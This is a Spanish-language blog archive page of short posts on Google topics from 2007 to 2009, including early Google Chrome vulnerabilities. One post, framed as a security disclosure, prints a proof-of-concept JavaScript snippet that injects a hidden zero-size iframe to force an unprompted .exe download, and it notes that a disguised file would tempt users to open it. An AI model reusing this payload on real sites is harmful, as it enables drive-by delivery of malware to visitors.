31 enero 2009 
7 Comentarios
Hace pocos minutos todas las búsquedas que realizaba en Google.com me arrojaba el mensaje “Este sitio puede dañar tu equipo”, en todas las paginas de resultado, al principio pensé en un ataque masivo sobre Internet (que dramático jejeje) pero realicé la búsqueda “google” en google (no se acabo el mundo como muchos dicen) y veo que todos los resultados aparecían igual.
Leer más…
26 enero 2009 2 Comentarios
Google ha implementado en su sistema de correo, GMail, la posibilidad de utilizar el plugin Google Gears que permitiria leer el correo de forma offline.
Lo que hace el GoogleGears es descargar nuestros correos cuando estamos online y cuando ya no tenemos conexión, igual podemos revisar, eliminarlos e incluso redactar nuevos emails, cuando volvamos a estar online, los correos creados serán enviados, y todos los cambios que hemos realizado en nuestra cuenta se llevarán a cabo.
Leer más…
11 diciembre 2008 2 Comentarios
Google publicó el Manual de Seguridad del navegador para el público en general. El documento des 60 páginas proporciona una amplia comparación de un amplio conjunto de características de seguridad y características de uso común en los navegadores, junto con útiles comentarios y sugerencias de aplicación para los desarrolladores que necesitan confiar en estos mecanismos.
El texto proporciona a los desarrolladores de aplicaciones web, navegadores, y los investigadores de seguridad una guia de referencia a las principales propiedades de seguridad de los navegadores web. La insuficiente comprensión de estas a menudo mal documentados características es un importante factor que contribuye a la prevalencia de varias clases de vulnerabilidades de seguridad. Leer más…
4 septiembre 2008 16 Comentarios
El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.
Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.
<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>He subido una prueba de concepto al servidor con la calculadora de windows y haciendo click aquí obtendrás algo parecido a esto.
El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.
La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.
Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome
3 septiembre 2008 9 Comentarios
Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google.
El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen). Leer más…
2 septiembre 2008 9 Comentarios
No ha pasado ni 24 horas desde que google anuncio oficialmente su navegador “Google Chrome” y ya ha sido detectada la primera Vulnerabilidad en este.
Google Chrome es vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa. Leer más…
22 agosto 2008 6 Comentarios
Gran controversia a levantado la pequeña gimnasta olímpica He Kexin por el hecho de que según su pasaporte y la Fédération Internationale de Gymnastique (FIG) su fecha de nacimiento es Enero 1 de 1992 sin embargo algunas pequeñas investigaciones en Google podrían mostrar algo como Enero 1 de 1994.
La investigación se puede ver en algunos posts del blog de Stryde un consultor informático en defensa de la seguridad de la información.
Según Stryde si hacemos unas pequeñas búsquedas usando buscadores web podemos encontrar las discrepancias de fechas que han levantado está controversia.
24 febrero 2008 2 Comentarios
21 noviembre 2007 5 Comentarios
